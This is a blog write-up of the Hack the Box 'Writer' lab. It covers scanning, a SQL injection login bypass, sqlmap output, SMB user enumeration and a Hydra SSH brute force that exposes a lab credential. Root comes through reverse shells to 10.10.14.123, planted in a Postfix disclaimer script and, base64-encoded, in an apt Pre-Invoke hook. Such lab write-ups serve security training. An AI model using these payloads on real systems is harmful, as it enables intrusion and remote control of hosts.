top of page
BlueDolphin

Hack the Box - Writer

Updated: Apr 20, 2022

Engagement flow
Summary

This was a cool but confusing lab. I found myself trying many different paths and constantly unsure of what to do next. We started off with some SQL injection, that allowed for us to collect files off the backend host. However I initially found nothing helpful, but the web server code. This python code allegedly had a vulnerability in it, but I worked with RPC enum over SMB for a users name and then SSH bruteforcing with Hydra provided for an initial foothold. From here we pivoted and elevated our privileges to an advance user via excessive group privillegs on a Email post fix disclaimer tool. We were able to add custom code into the disclaimer script, executing to tag every outgoing email with a disclaimer.


Finally we pivoted to root where we targeted the cronjobs and again found excessive permissions on the apt.confd file. From here we followed a known exploit from GTFO bin to inject OS commands in the apt update process due to improper input handling.

Processes/Techniques
  • SQL injection

  • RPC enumeration

  • SSH bruteforcing

  • Cron job manipulation

  • Post fix disclaimer injection

  • GTFO bins

References

Tools used
  • Dirbuster

  • Burpsuite

  • Burp repeater

  • Linpeas

  • Hydra

  • SQLmap

  • Enum4linux


Enumeration

└─$ nmap 10.129.176.17

Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-14 12:58 EST

Nmap scan report for 10.129.176.17

Host is up (0.083s latency).

Not shown: 996 closed ports

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

139/tcp open netbios-ssn

445/tcp open microsoft-ds



In depth scan


└─$ nmap 10.129.176.17 -sC -sV

Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-14 13:00 EST

Nmap scan report for 10.129.176.17

Host is up (0.078s latency).

Not shown: 996 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 3072 98:20:b9:d0:52:1f:4e:10:3a:4a:93:7e:50:bc:b8:7d (RSA)

| 256 10:04:79:7a:29:74:db:28:f9:ff:af:68:df:f1:3f:34 (ECDSA)

|_ 256 77:c4:86:9a:9f:33:4f:da:71:20:2c:e1:51:10:7e:8d (ED25519)

80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

|_http-server-header: Apache/2.4.41 (Ubuntu)

|_http-title: Story Bank | Writer.HTB

139/tcp open netbios-ssn Samba smbd 4.6.2

445/tcp open netbios-ssn Samba smbd 4.6.2

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Host script results:

|_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

| smb2-security-mode:

| 2.02:

|_ Message signing enabled but not required

| smb2-time:

| date: 2022-01-14T18:00:24

|_ start_date: N/A


Service detection performed. Please report any iYes09ooooooooooooooo-===========klllllllll,0.o.ncorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 17.04 seconds


Web Enumeration

We jump into web enumeration and have a pretty simple site with nothing interactive. We add writer.htb and it does not resolve any differently.



Running dirbuster provides an interesting directory to enumerate.


Dirbuster /administraitve/



SQL loginbypass

Browsing to the web page provides a simple login form we are able to by pass with basic SQL injection payloads.


1 or 1=1-- -



SQL Map vulnerable login form

Having had exploited the page we can further investigate this by catching the page with burp and saving this request for sqlmap automated testing.

I used sqlmap at a basic level on our request with the below command. We learn that the back end DB is running MySQL


sqlmap -r login


We take this further and call the --os-shell function. Which is a lazy way to capitalize on an already automated tool. But we have no success.


└─$ sqlmap -r login -D MYSQL --os-shell


[20:40:31] [INFO] parsing HTTP request from 'login'

[20:40:31] [INFO] resuming back-end DBMS 'mysql'

[20:40:31] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: uname (POST)

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: uname=admin' AND (SELECT 2214 FROM (SELECT(SLEEP(5)))mXhp) AND 'iGix'='iGix&password=admin

---

[20:40:31] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 19.10 or 20.04 (focal or eoan)

web application technology: Apache 2.4.41

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

[20:40:31] [INFO] going to use a web backdoor for command prompt

[20:40:31] [INFO] fingerprinting the back-end DBMS operating system

[20:40:34] [INFO] the back-end DBMS operating system is Linux

which web application language does the web server support?

[1] ASP

[2] ASPX

[3] JSP

[4] PHP (default)

> whoami

[20:40:37] [WARNING] invalid value, only digits are allowed

which web application language does the web server support?

[1] ASP

[2] ASPX

[3] JSP

[4] PHP (default)

> 4

do you want sqlmap to further try to provoke the full path disclosure? [Y/n] Y

[20:40:45] [WARNING] unable to automatically retrieve the web server document root

what do you want to use for writable directory?

[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)

[2] custom location(s)

[3] custom directory list file

[4] brute force search

> 1

[20:40:53] [WARNING] unable to automatically parse any web server path

[20:40:53] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method

[20:40:53] [WARNING] unable to upload the file stager on '/var/www/'

[20:40:53] [INFO] trying to upload the file stager on '/var/www/administrative/' via LIMIT 'LINES TERMINATED BY' method

[20:40:54] [WARNING] unable to upload the file stager on '/var/www/administrative/'

[20:40:54] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method

[20:40:54] [WARNING] unable to upload the file stager on '/var/www/html/'

[20:40:54] [INFO] trying to upload the file stager on '/var/www/html/administrative/' via LIMIT 'LINES TERMINATED BY' method

[20:40:55] [WARNING] unable to upload the file stager on '/var/www/html/administrative/'

[20:40:55] [INFO] trying to upload the file stager on '/var/www/htdocs/' via LIMIT 'LINES TERMINATED BY' method

[20:40:56] [WARNING] unable to upload the file stager on '/var/www/htdocs/'

[20:40:56] [INFO] trying to upload the file stager on '/var/www/htdocs/administrative/' via LIMIT 'LINES TERMINATED BY' method

[20:40:56] [WARNING] unable to upload the file stager on '/var/www/htdocs/administrative/'

[20:40:56] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method

[20:40:57] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/'

[20:40:57] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/administrative/' via LIMIT 'LINES TERMINATED BY' method

[20:40:58] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/administrative/'

[20:40:58] [INFO] trying to upload the file stager on '/usr/local/www/data/' via LIMIT 'LINES TERMINATED BY' method

[20:40:58] [WARNING] unable to upload the file stager on '/usr/local/www/data/'

[20:40:58] [INFO] trying to upload the file stager on '/usr/local/www/data/administrative/' via LIMIT 'LINES TERMINATED BY' method

[20:40:59] [WARNING] unable to upload the file stager on '/usr/local/www/data/administrative/'

[20:40:59] [INFO] trying to upload the file stager on '/var/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method

[20:41:00] [WARNING] unable to upload the file stager on '/var/apache2/htdocs/'

[20:41:00] [INFO] trying to upload the file stager on '/var/apache2/htdocs/administrative/' via LIMIT 'LINES TERMINATED BY' method

[20:41:00] [WARNING] unable to upload the file stager on '/var/apache2/htdocs/administrative/'

[20:41:00] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via LIMIT 'LINES TERMINATED BY' method

[20:41:01] [WARNING] unable to upload the file stager on '/var/www/nginx-default/'

[20:41:01] [INFO] trying to upload the file stager on '/var/www/nginx-default/administrative/' via LIMIT 'LINES TERMINATED BY' method

[20:41:02] [WARNING] unable to upload the file stager on '/var/www/nginx-default/administrative/'

[20:41:02] [INFO] trying to upload the file stager on '/srv/www/htdocs/' via LIMIT 'LINES TERMINATED BY' method

[20:41:02] [WARNING] unable to upload the file stager on '/srv/www/htdocs/'

[20:41:02] [INFO] trying to upload the file stager on '/srv/www/htdocs/administrative/' via LIMIT 'LINES TERMINATED BY' method

[20:41:03] [WARNING] unable to upload the file stager on '/srv/www/htdocs/administrative/'

[20:41:03] [INFO] trying to upload the file stager on '/usr/local/var/www/' via LIMIT 'LINES TERMINATED BY' method

[20:41:04] [WARNING] unable to upload the file stager on '/usr/local/var/www/'

[20:41:04] [INFO] trying to upload the file stager on '/usr/local/var/www/administrative/' via LIMIT 'LINES TERMINATED BY' method

[20:41:05] [WARNING] unable to upload the file stager on '/usr/local/var/www/administrative/'

[20:41:05] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 1 times, 404 (Not Found) - 85 times

[20:41:05] [INFO] fetched dat'/home/kali/.local/share/sqlmap/output/writer.htb'a logged to text files under


[*] ending @ 20:41:05 /2022-01-14/


So we try all the available flags and the privilege flag shows we have permissions over files. We could utilize SQL map to download these files, which I did, but I could not spot the vulnerability in the python code.


sqlmap -r login --privilege


[13:01:29] [INFO] fetching database users privileges
[13:01:29] [INFO] fetching database users
[13:01:29] [INFO] fetching number of database users
[13:01:29] [INFO] retrieved: 1
[13:01:35] [INFO] retrieved: 
[13:01:40] [INFO] adjusting time delay to 2 seconds due to good response times
'admin'@'localhost'
[13:04:05] [INFO] fetching number of privileges for user 'admin'
[13:04:05] [INFO] retrieved: 1
[13:04:08] [INFO] fetching privileges for user 'admin'
[13:04:08] [INFO] retrieved: FILE
database management system users privileges:
[*] %admin% [1]:
    privilege: FILE

[13:04:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.129.176.255'

[*] ending @ 13:04:33 /2022-01-16/

RPC client enumeration

We find a username with rpc enum.


└─$ rpcclient -U '' -N writer.htb 1 ⨯

rpcclient $> srvinfo

WRITER Wk Sv PrQ Unx NT SNT writer server (Samba, Ubuntu)

platform_id : 500

os version : 6.1

server type : 0x809a03

rpcclient $> enumdomusers

user:[kyle] rid:[0x3e8]

rpcclient $>



SSH Bruteforce with Hydra

We take our user name, select the rockyou.txt and get started.


kyle:marcoantonio


Privilege escalation

So we arrive as user Kyle and need to escalate our privileges.

Looking at the group information we see that we are apart of the filter group so we dive in, to learn what that gets us access to.


Attempting to view the files that the group "filter" had access to provided a ton of errors!


So I called 2>dev/null to suppress the errors in the terminal.


Having learned we have special permissions on disclaimer, we check out the files within.


List all files and check permissions


What is postifix?

Postfix is a popular open-source Mail Transfer Agent (MTA) that can be used to route and deliver email on a Linux system. It is estimated that around 25% of public mail servers on the internet run Postfix.


Checking local ports we can confirm we have port 25 which is responsible for mail services.



Examine master.cf


workflow


  1. add rev shell

  2. Check if mail server is running

  3. connect to mail server with netcat

  4. ehlo

  5. mail from: kyle@writer.htb

  6. RCPT TO: root@writer.htb

  7. DATA

  8. subject: boom mail

  9. booooom

#!/bin/sh

bash -c 'bash -i >& /dev/tcp/10.10.14.123/6363 0>&1'


Establish persistence

Download John's ssh key and boom we have persistence.

We start our enumeration by looking at group info.


This leads is down to a GTFO bin related exploit, which be further read at this link


We tailor a payload that does not initially work, however base64 encoding passes successfully.

/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.123/5353 0>&1"


L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIzLzUzNTMgMD4mMSI=


echo 'apt::Update::Pre-Invoke {“L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIzLzUzNTMgMD4mMSI= | base64 -d | bash”};'

765 views0 comments

Recent Posts

See All

Comments


bottom of page